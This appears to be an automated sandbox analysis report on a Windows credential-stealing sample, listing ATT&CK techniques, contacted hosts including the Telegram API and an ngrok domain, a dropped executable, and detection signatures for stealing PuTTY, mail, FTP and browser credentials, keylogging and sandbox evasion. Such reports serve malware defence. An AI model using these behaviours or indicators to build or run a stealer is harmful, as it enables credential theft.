              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Behavior Graph ID: 1619245
              Sample: gq8sce-clean.com.com.exe
              Start date: 19/02/2025
              Architecture: WINDOWS
              Score: 100

              Start node: api.telegram.org, kvrcmhqc.ngrok.io, 2 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 5 other signatures. Signature attached to api.telegram.org: Uses the Telegram API (likely for C&C communication). Processes started: gq8sce-clean.com.com.exe, OgBoRN.exe, OgBoRN.exe.
              Process gq8sce-clean.com.com.exe: contacts ip-api.com 208.95.112.1, 49705, 49750, 49805 TUT-ASUS United States; api.telegram.org 149.154.167.220, 443, 49707, 49708 TELEGRAMRU United Kingdom; 2 other IPs or domains. Dropped: C:\Users\user\AppData\Roaming\...\OgBoRN.exe, PE32; C:\Users\user\...\OgBoRN.exe:Zone.Identifier, ASCII. Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 2 other signatures.
              Process OgBoRN.exe (first instance): Signatures: Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file / registry access); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function).
              Process OgBoRN.exe (second instance): Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook.
